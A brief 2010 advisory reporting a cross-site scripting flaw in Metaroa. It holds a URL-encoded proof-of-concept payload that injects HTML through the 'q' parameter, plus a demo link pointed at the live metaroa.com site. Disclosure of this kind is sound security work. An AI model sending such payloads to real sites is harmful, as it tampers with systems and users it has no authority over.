Metaroa suffers from a cross site scripting vulnerability.
f58b3fc2b39abd60431403854787f69bf02ae0deb2695a36673cef738086b001
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!! !!
!! METAROA XSS Vulnerability !!
!! !!
!! Author : Mohammad . Javanbakht !!
!! Email : Secanar[at]gmail.com !!
!! Blog : secanar.blogspot.com !!
!! !!
!! Date : Saturday , August 14 2010 !!
!! !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Exploit:
http://[site]/index.php?q=%3Cmarquee%3E%3Ch1+style%3D%22color%3Ared%3B%22%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&server=
Demo:
http://metaroa.com/index.php?q=%3Cmarquee%3E%3Ch1+style%3D%22color%3Ared%3B%22%3EXSS+Vulnerability%3C%2Fh1%3E%3C%2Fmarquee%3E&server=
END !